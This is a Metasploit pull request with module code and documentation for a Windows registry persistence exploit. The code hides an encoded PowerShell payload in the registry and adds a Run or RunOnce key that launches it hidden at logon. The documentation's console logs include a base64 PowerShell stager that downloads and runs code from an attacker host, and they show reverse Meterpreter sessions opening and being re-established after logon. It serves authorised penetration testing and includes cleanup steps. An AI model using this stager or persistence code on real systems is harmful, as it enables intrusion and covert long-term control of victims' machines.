### PR TITLE
update windows registry to persistence mixin

### DIFF
--- a/documentation/modules/exploit/windows/persistence/registry.md
+++ b/documentation/modules/exploit/windows/persistence/registry.md
@@ -1,0 +1,164 @@
+## Vulnerable Application
+
+This module will install a payload that is executed during boot.
+It will be executed either at user logon or system startup via the registry
+value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
+The payload will be installed completely in registry.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell on Windows
+3. Do: `use [module path]`
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### STARTUP
+
+Startup type for the persistent payload. Options are `USER` and `SYSTEM`, defaults to `USER`.
+
+### BLOB_REG_KEY
+
+The registry key to use for storing the payload blob. Default: random
+
+### BLOB_REG_NAME
+
+The name to use for storing the payload blob. Default: random
+
+### RUN_NAME
+
+The name to use for the `Run` key. Default: random
+
+### SLEEP_TIME
+
+Amount of time to sleep (in seconds) before executing payload. Default: 0
+
+### RegKey
+
+Registry Key To Install To. Options are `Run` and `RunOnce`. Defaults to `Run`
+
+## Scenarios
+
+### Windows 10 22H2+ User access
+
+Obtain original shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABwADAAMwB4AG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAcAAwADMAeABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAcAAwADMAeABuAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBzAHUAWABJAE4AUgBnAGYAagBwAHUAbwAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2     web_delivery - Powershell command length: 3709
+[*] 2.2.2.2     web_delivery - Delivering Payload (3709 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:50218) at 2025-10-19 09:24:28 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/registry 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/registry) > set session 1
+session => 1
+msf exploit(windows/persistence/registry) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/registry) > check
+[+] Powershell detected on system
+[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ws7IB4gE1WPHLZb
+[+] The target is vulnerable. Registry writable
+msf exploit(windows/persistence/registry) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/registry) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] Powershell detected on system
+[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KXBPUprYbD5frAT
+[+] The target is vulnerable. Registry writable
+[*] Generating payload blob..
+[*] Powershell command length: 6885
+[+] Generated payload, 6816 bytes
+[*] Root path is HKCU
+[*] Installing payload blob..
+[+] Created registry key HKCU\Software\meCSomm1
+[+] Installed payload blob to HKCU\Software\meCSomm1\haUGCPh4
+[*] Installing run key
+[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\O4aWIeM8
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc
+```
+
+Logout user (killing original shell), and log back in
+
+```
+msf exploit(windows/persistence/registry) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50225) at 2025-10-19 09:28:43 -0400
+
+msf exploit(windows/persistence/registry) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > background
+[*] Backgrounding session 2...
+```
+
+Cleanup
+
+```
+msf exploit(windows/persistence/registry) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc
+[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc for ERB directives.
+resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deleteval -k 'HKCU\Software\meCSomm1' -v 'haUGCPh4'
+Successfully deleted haUGCPh4.
+resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deletekey -k 'HKCU\Software\meCSomm1'
+Successfully deleted key: HKCU\Software\meCSomm1
+resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v 'O4aWIeM8'
+Successfully deleted O4aWIeM8.
+meterpreter >
+```

--- a/documentation/modules/exploit/windows/persistence/registry.md
+++ b/documentation/modules/exploit/windows/persistence/registry.md
@@ -36,7 +36,7 @@ The name to use for the `Run` key. Default: random
 
 Amount of time to sleep (in seconds) before executing payload. Default: 0
 
-### RegKey
+### REG_KEY
 
 Registry Key To Install To. Options are `Run` and `RunOnce`. Defaults to `Run`
 

--- a/documentation/modules/exploit/windows/persistence/registry.md
+++ b/documentation/modules/exploit/windows/persistence/registry.md
@@ -9,9 +9,10 @@ The payload will be installed completely in registry.
 
 1. Start msfconsole
 2. Get a shell on Windows
-3. Do: `use [module path]`
-4. Do: `run`
-5. You should get a shell.
+3. Do: `use exploit/windows/persistence/registry`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get a shell on user or system login.
 
 ## Options
 

--- a/modules/exploits/windows/persistence/registry.rb
+++ b/modules/exploits/windows/persistence/registry.rb
@@ -9,6 +9,10 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::Powershell
   include Msf::Post::Windows::Registry
   include Msf::Post::File
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/registry_persistence'
 
   def initialize(info = {})
     super(
@@ -18,27 +22,31 @@ class MetasploitModule < Msf::Exploit::Local
         'Description' => %q{
           This module will install a payload that is executed during boot.
           It will be executed either at user logon or system startup via the registry
-          value in "CurrentVersion\Run" (depending on privilege and selected method).
+          value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
           The payload will be installed completely in registry.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Donny Maasland <donny.maasland[at]fox-it.com>',
+          'Donny Maasland <donny.maasland[at]fox-it.com>', # original module
+          'h00die',
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter', 'shell' ],
         'Targets' => [
           [ 'Automatic', {} ]
         ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
+          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys'],
+          ['URL', 'https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/']
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2015-07-01',
-        'DefaultOptions' => {
-          'DisablePayloadHandler' => true
-        },
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
         }
       )
     )
@@ -52,25 +60,22 @@ class MetasploitModule < Msf::Exploit::Local
                     [false, 'The name to use for storing the payload blob. (Default: random)' ]),
       OptString.new('RUN_NAME',
                     [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
-      OptBool.new('CREATE_RC',
-                  [false, 'Create a resource file for cleanup', true]),
       OptInt.new('SLEEP_TIME',
                  [false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
+      OptEnum.new('RegKey', [true, 'Registry Key To Install To', 'Run', %w[Run RunOnce]]),
     ])
   end
 
   def generate_payload_blob
     opts = {
       wrap_double_quotes: true,
-      encode_final_payload: true,
+      encode_final_payload: true
     }
-    blob = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts).split(' ')[-1]
-    return blob
+    cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts).split(' ')[-1]
   end
 
   def generate_cmd(root_path, blob_key_name, blob_key_reg)
-    cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep #{datastore['SLEEP_TIME']}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
-    return cmd
+    "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep #{datastore['SLEEP_TIME']}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
   end
 
   def generate_blob_reg
@@ -80,14 +85,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def generate_cmd_reg
-    cmd_reg = datastore['RUN_NAME'] || Rex::Text.rand_text_alphanumeric(8)
-    return cmd_reg
+    datastore['RUN_NAME'] || Rex::Text.rand_text_alphanumeric(8)
   end
 
   def install_blob(root_path, blob, blob_reg_key, blob_reg_name)
     blob_reg_key = "#{root_path}\\#{blob_reg_key}"
     new_key = false
-    if not registry_enumkeys(blob_reg_key)
+    if !registry_enumkeys(blob_reg_key)
       unless registry_createkey(blob_reg_key)
         fail_with(Failure::Unknown, "Failed to create key #{blob_reg_key}")
       end
@@ -95,91 +99,56 @@ class MetasploitModule < Msf::Exploit::Local
       new_key = true
     end
 
-    unless registry_setvaldata(blob_reg_key, blob_reg_name, blob, "REG_SZ")
+    unless registry_setvaldata(blob_reg_key, blob_reg_name, blob, 'REG_SZ')
       fail_with(Failure::Unknown, 'Failed to open the registry key for writing')
     end
     print_good("Installed payload blob to #{blob_reg_key}\\#{blob_reg_name}")
     return new_key
   end
 
+  def runkey
+    datastore['RegKey']
+  end
+
   def install_cmd(cmd, cmd_reg, root_path)
-    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", cmd_reg, cmd, 'REG_EXPAND_SZ')
+    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
       fail_with(Failure::Unknown, 'Could not install run key')
     end
-    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{cmd_reg}")
+    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{cmd_reg}")
   end
 
   def get_root_path
-    if datastore['STARTUP'] == 'USER'
-      root_path = 'HKCU'
-    else
-      root_path = 'HKLM'
-    end
-    return root_path
+    return 'HKCU' if datastore['STARTUP'] == 'USER'
+
+    'HKLM'
   end
 
-  def log_file(log_path = nil) # Thanks Meatballs for this
-    # Get hostname
-    host = session.session_host
-
-    # Create Filename info to be appended to downloaded files
-    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
-    # Create a directory for the logs
-    if log_path
-      logs = ::File.join(log_path, 'logs', 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo))
-    else
-      logs = ::File.join(Msf::Config.log_directory, 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo))
-    end
-
-    # Create the log directory
-    ::FileUtils.mkdir_p(logs)
-
-    # logfile name
-    logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
-    logfile
-  end
-
-  def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key) # Thanks Meatballs for this
-    clean_rc = log_file()
-    @clean_up_rc = ""
+  def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
     @clean_up_rc << "reg deleteval -k '#{root_path}\\#{blob_reg_key}' -v '#{blob_reg_name}'\n"
     if new_key
       @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
     end
-    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v '#{cmd_reg}'\n"
-    file_local_write(clean_rc, @clean_up_rc)
-    print_status("Clean up Meterpreter RC file: #{clean_rc}")
-
-    report_note(:host => session.session_host,
-                type: 'host.persistance.cleanup',
-                data: {
-                  local_id: session.sid,
-                  stype: session.type,
-                  desc: session.info,
-                  platform: session.platform,
-                  via_payload: session.via_payload,
-                  via_exploit: session.via_exploit,
-                  created_at: Time.now.utc,
-                  commands: @clean_up_rc
-                })
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}' -v '#{cmd_reg}'\n"
   end
 
   def check
-    unless registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
-      return Msf::Exploit::CheckCode::Safe
-    end
+    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')
 
-    return Msf::Exploit::CheckCode::Vulnerable
+    vprint_good('Powershell detected on system')
+
+    # test write to see if we have access
+    root_path = get_root_path
+    rand = Rex::Text.rand_text_alphanumeric(15)
+
+    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{rand}")
+    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
+
+    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{rand}")
+
+    Msf::Exploit::CheckCode::Vulnerable('Registry writable')
   end
 
-  def exploit
-    unless registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
-      print_warning('Warning: PowerShell does not seem to be available, persistence might fail')
-    end
-
+  def install_persistence
     print_status('Generating payload blob..')
     blob = generate_payload_blob
     print_good("Generated payload, #{blob.length} bytes")
@@ -197,8 +166,6 @@ class MetasploitModule < Msf::Exploit::Local
     print_status('Installing run key')
     install_cmd(cmd, cmd_reg, root_path)
 
-    if datastore['CREATE_RC']
-      create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
-    end
+    create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
   end
 end

--- a/modules/exploits/windows/persistence/registry.rb
+++ b/modules/exploits/windows/persistence/registry.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
                     [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
       OptInt.new('SLEEP_TIME',
                  [false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
-      OptEnum.new('RegKey', [true, 'Registry Key To Install To', 'Run', %w[Run RunOnce]]),
+      OptEnum.new('REG_KEY', [true, 'Registry Key To Install To', 'Run', %w[Run RunOnce]]),
     ])
   end
 
@@ -106,15 +106,15 @@ class MetasploitModule < Msf::Exploit::Local
     return new_key
   end
 
-  def runkey
-    datastore['RegKey']
+  def regkey
+    datastore['REG_KEY']
   end
 
   def install_cmd(cmd, cmd_reg, root_path)
-    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
+    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
       fail_with(Failure::Unknown, 'Could not install run key')
     end
-    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{cmd_reg}")
+    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{cmd_reg}")
   end
 
   def get_root_path
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
     if new_key
       @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
     end
-    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}' -v '#{cmd_reg}'\n"
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}' -v '#{cmd_reg}'\n"
   end
 
   def check
@@ -140,10 +140,10 @@ class MetasploitModule < Msf::Exploit::Local
     root_path = get_root_path
     rand = Rex::Text.rand_text_alphanumeric(15)
 
-    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{rand}")
-    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
+    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
+    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
 
-    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{rand}")
+    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
 
     Msf::Exploit::CheckCode::Vulnerable('Registry writable')
   end


### PR DESCRIPTION
Updates the windows registry persistence to the new mixin, adds `RunOnce` as an option. Part of #20374


## Verification

- [ ] Start `msfconsole`
- [ ] exploit the box somehow
- [ ] `use exploit/windows/persistence/registry`
- [ ] `set SESSION <id>`
- [ ] `exploit`
- [ ] **Verify** persistence is created, and you get a new session if apt is run
- [ ] **Verify** cleanup works
- [ ] **Document** is updated and correct